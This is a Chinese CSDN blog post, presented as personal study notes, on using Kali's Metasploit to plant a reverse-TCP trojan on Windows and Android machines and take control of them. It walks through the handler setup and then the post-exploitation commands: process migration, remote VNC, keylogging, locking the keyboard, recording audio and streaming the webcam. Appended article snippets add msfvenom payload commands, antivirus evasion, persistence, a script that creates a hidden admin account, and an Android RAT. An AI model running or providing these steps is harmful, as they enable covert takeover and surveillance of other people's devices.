kali metasploit 木马入侵windows和Android

最新推荐文章于 2024-09-21 09:29:22 发布
最新推荐文章于 2024-09-21 09:29:22 发布
阅读量1.4w 收藏 207
点赞数 26
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38611079/article/details/82799704
版权

windows :根据自己的kali IP 生成木马

木马生成

注意shell >  shell.exe之间是有空格的,LHOST是kali 本机的IP ,LPORT是自定义设置的端口,据说高端口比较好过防火墙,(但是我实验的时候感觉差不多,基于win10 的实验,防火墙需要全关了,不然木马文件根本过不去)

生成木马后的文件在本机的主目录下。

file

生成木马后,要把木马拖到要攻击的目标主机下 

打开metasploit,进行攻击

 打开metasploit :msfconsole

调用模块:use exploit/multi/handler

调用payload :set payload windows/meterpreter/reverse_tcp

显示选项;show options

diaouyong

show

参数设置:set LHOST (KALI本机的的IP)

                set LPORT (端口设置与前面的木马端口要一致)

确认设置是否设置成功:show options

shezhi

运行:exploit(进行等待,只要目标主机打开了木马文件,便能扫描到,测试的要人工去打开了,在android上的则要进行安装)

yunxing

结果:

陈宫g

这里显示有一台机器正在运行本机的木马,说明已经拿到了控制权,可以使用help查看命令。

进程注入

 因为木马可能随时会被关掉,所以拿到控制权后,要第一时间进行进程注入。

查看进程列表:ps

 fds a

找到相应的进程:explorer.exe  .并记下pid   (Windows程序管理器或者文件资源管理器,它用于管理Windows图形壳,包括桌面和文件管理,删除该程序会导致Windows图形界面无法使用)

sdaf

进行注入:magtate  4560  

sdf

注入成功。

 

远程桌面查看:run  vnc

键盘监控:keyscan_start

                 keyscan_dump

                keyscan_stop

键盘鼠标锁定:uictl disable keyboard

                       uictl enable keyboard(mouse/all)

录音:record -d  10  (10是十秒的意思,生成的音频是wav格式的,找一个播放器就可以播放)

打开机器的网络摄像头:webcam_stream

shexiangtou

ctrl + C 退出当前操作

exit 退出程序

 

Android 入侵:

步骤跟入侵windows是一样的,就只是有一些命令要改成android,如木马生成的命令中的windows 要改成android,shell > shell.exe要改成 apk > apk.apk  .调用payload中的windows也是改成android。

 

 

android

个人感觉android入侵要比windows要简单。

个人学习笔记。

 

27sss
关注
漏洞复现:使用Kali制作木马程序
dingbai2663的博客
09-30 3481
漏洞复现:使用Kali制作木马程序 攻击机:Kali2019 靶机:Win7 64位 攻击步骤: 1.打开Kali2019和Win7 64位虚拟机,确定IP地址在一个网段 2.确定好IP地址,进入Kali2019进行木马文件.exe制作,命令如下 命令:msfvenom -p windows/meterpreter/reverse_tc...
关于metasploit木马免杀,维持权限以及进程迁移
m0_46682482的博客
07-22 2446
hi,大家好,我是铁汉fhoenix。这里我为各位总结一下msf的免杀,维持以及进程迁移。 1.在目标运行M马,取得shell以后。可以先查询进程然后进行注入,这里我们用最简单的方法。直接输入run post/windows/manage/migrate 模块注入它会自动寻找合适的进程注入,并且自动迁移进程。 2.通过msf自带的persistence模块可以设置启动项来进行维持。下面我来解释一下,拿到shell以后输入run persistence -P windows/x64/mete.
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
第二天-03-安卓手机的入侵实验
qq_56414082的博客
12-21 3340
电脑主机与手机模拟器或者真机在当前环境下,网络是畅通的,相互之间可以进行通信。如何进行测试网络环境:我们首先需要确定IP。linux通过终端命令 # ip a 或者 #ifconfigwindown下:win加r输入cmd调出终端,使用ipconfig查看ip地址。kali下:Android模拟器下:在安卓真机下:打开wifi操作:知道IP后使用ping命令测试是否可以连通。终端下命令:​ ping 目标主机ip。
使用Kali Linux系统生成木马病毒并实现远程控制计算机
最新发布
2401_84578953的博客
09-21 1368
木马生成木马病毒并实现远程控制计算机木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码通常有控制端和被控制端两个可执行程序。它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种者电脑的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至还可以远程操控被种者的电脑。我将会详细的介绍使用Kali Linux系统生成木马,并用它远程控制一台处在外网的物理计算机。**使用工具**VMware Workstation Pro 16(虚拟机)Kali Linux 2021(系统)
android 入侵检测系统,基于行为模式的Android平台入侵检测系统的设计与实现
weixin_35748508的博客
05-28 447
摘要:随着Android平台的流行,针对Android平台的恶意攻击也日益增多。Android系统虽然已经提供了诸如沙箱、Permission机制等安全措施来保证系统安全,但是在巨大商业利益的激励下,无数攻击者针对系统和软件本身漏洞、安全机制漏洞等,对Android用户展开了各种形式的攻击。在这过程中Android系统已经暴露出开放模式、系统漏洞、软件漏洞、permission机制漏洞等严重安全威...
Android常见漏洞
Lighthouse
02-14 1213
转载: 360APP漏洞扫描 常见漏洞 漏洞名称: Log敏感信息泄露 漏洞描述: 程序运行期间打印了用户的敏感信息,造成泄露 修改建议: 建议禁止隐私信息的log 漏洞名称: web https校验错误忽略漏洞 漏洞描述: 漏洞可导致中间人攻击 修改建议: 建议不要忽略ssl认证错误 漏洞名称: sql注入漏洞 漏洞描述: 漏洞可能导致用户数据库中的信息泄露或者篡改 修改建议: 建议使用安全sq...
Ubuntu安装教程(非常详细)从零基础入门到精通,看完这一篇就够了_
m0_59598029的博客
08-20 5249
很多小伙伴在Ubuntu的安装上总会有疑问,今天就来给小可爱们来一套完整的Ubuntu快速安装教程。
Kali环境使用Metasploit生成木马入侵安卓手机
热门推荐
zhaghailiangji的博客
02-27 2万+
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。环境准备:Kali2.0(msfVENOM、metasploit)安卓手机或安卓模拟器利用过程:先查看本地IP...
Kali 2020:用Metasploit实验入侵自己的安卓手机
askos的博客
11-01 1万+
目标:使用Kali里的Metasploit远程控制自己的安卓手机 (先写个大体的流程,改天做成详细教程。仅限于对自己的手机做实验,请勿用于非法行为) 一:生产apk安卓应用 1,使用msfvenom生成一个预设定向连接kali主机的apk安卓应用。 msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.12 lport=4444 R > t.apk 2,使用zipzlign对apk进行对齐 zipalign -v 4 t.apk tz
Kali Linux使用Metasploit生成木马入侵安卓系统
简介
02-24 8394
前言,前言这是我最难想出来的对,这是我最后一篇文章,周一我们开学了,漏洞实战怕实现不了,至少放假可以更文章,我们只放一天,提示:以下是本篇文章正文内容,下面案例可供参考时间不够了,所以不做演示了,所以再见。
windows入侵提权-创建隐藏帐号
12-12
windows入侵提权-创建隐藏帐号 使用vbs的好处是可以通过echo 输入到远程计算机中,然后运行.(具体提权过程请参照本人相关的文章).      set wsnetwork=CreateObject("WSCRIPT.NETWORK")   os="WinNT://"&wsnetwork.ComputerName   Set ob=GetObject(os)   Set oe=GetObject(os&"/Administrators,group")   Set od=ob.Create("user","xxxx$")   od.SetPassword "yyyy"   od.SetInfo   Set of=GetObject(os&"/xxxx$",user)   oe.add os&"/xxxx$"
Metasploit
m0_57379855的博客
03-30 3336
Metasploitmetasploit下载ubuntu安装msfubuntu下载Kali开启msfKali下载Kali添加root用户打开msfKali更新msfViper炫彩蛇Kali安装viperMetasploit目录结构Metasploit模块auxiliaryexploitspayloadspostencodersevasionnopsmsfvenom常用参数-l-p-f-e-a-o-b-n-s-i-c-x-k-v各平台生成payload命令WindowsMacAndroidPowershell
Kali 下对安卓手机的攻击
m0_66524548的博客
01-29 1万+
写在前面:本文仅限学术交流,请勿用他人实践 Kali对安卓手机的攻击(渗透) 我们首先需要确定本机IP 这很简单,对于Kali来说我们需要打开终端并键入 ifconfig 即可获取自己的IP,然后我们需要确定安卓手机也就是被攻击者的IP,只需键入 fping -g 本机IP地址/24 这时我们就能确定目标IP,这次教程主要围绕创建后门程序展开 在终端中执行: # msfvenom -p android/meterpreter/reverse_tcp LHOST=目标IP LPORT=
Metasploit 实现木马生成、捆绑及免杀
阿里云云栖号
10-08 5447
简介:在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马进行免杀处理。本次实验我们将学习如何通过Metasploit的msfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理。木马文件风险高,想要免杀需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。 实验环境: Kali Linux 知识点: msfvenom 如何生.
2021-12-09 使用kali生成木马,渗透Windows系统
夕阳的街道的博客
12-09 1万+
一、实验题目:使用kali生成木马,渗透Windows系统 二、实验内容: 使用kali中的Metasploit生成木马,控制Windows系统 三、实验环境: 1. 攻击者IP(kali):192.168.112.130 2. 靶机IP(Windows10):192.168.112.136 三、实验步骤: 1. 保证两个系统能相互ping通 2. 生成木马,在kali打开终端,输入以下命令: msfvenom -p windows/meterpre...
使用AhMyth入侵Android智能手机
dl1286670932的博客
10-08 7647
在本教程中,我们将使用一个名为AhMyth的工具,这是一个开源远程访问工具AhMyth,它具有您希望在RAT中看到的许多功能,例如地理位置监控,SMS模块,联系人列表查看器,文件管理器,相机快照,麦克风录音机等等。
kali系统入侵电脑windows(win11系统)渗透测试,骇入电脑教学
这个博主不懒,但Ta什么也没写~(私信互关24小时必回)
01-27 7566
本次渗透测试将使用kali虚拟机(攻击机)对本机(靶机)进行入侵并监控屏幕。
kalilinux生成安卓木马(仅供学习使用)
qq_51999794的博客
07-27 2万+
kalilinux生成安卓木马——盗取手机数据、控制后台拍照、录像 一、前期准备工作 1.1虚拟机安装好kalilinux 链接:https://pan.baidu.com/s/10rcLYOGYKQb0pETqJLbD4A 提取码:p4dq (本身是想要给你们网站的但是那个包我找不到在哪下载的了,不想要网盘的可以去清华镜像/阿里镜像找找看) 上述是kalilinux的光盘镜像。 1.1.1kalilinux的安装 这个过程有点复杂,我之后再发博客详细讲解下kalilinux的安装。 1.1.2安装之后 打
kali metasploit 木马
08-30
如果你想了解如何在Kali Linux中使用Metasploit来创建和使用木马,我建议你参考一些相关的教程和指南。这些资源可以帮助你学习如何使用Metasploit来进行渗透测试,但请记住,合法和道德的用途是非常重要的。在未经...
评论 21
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值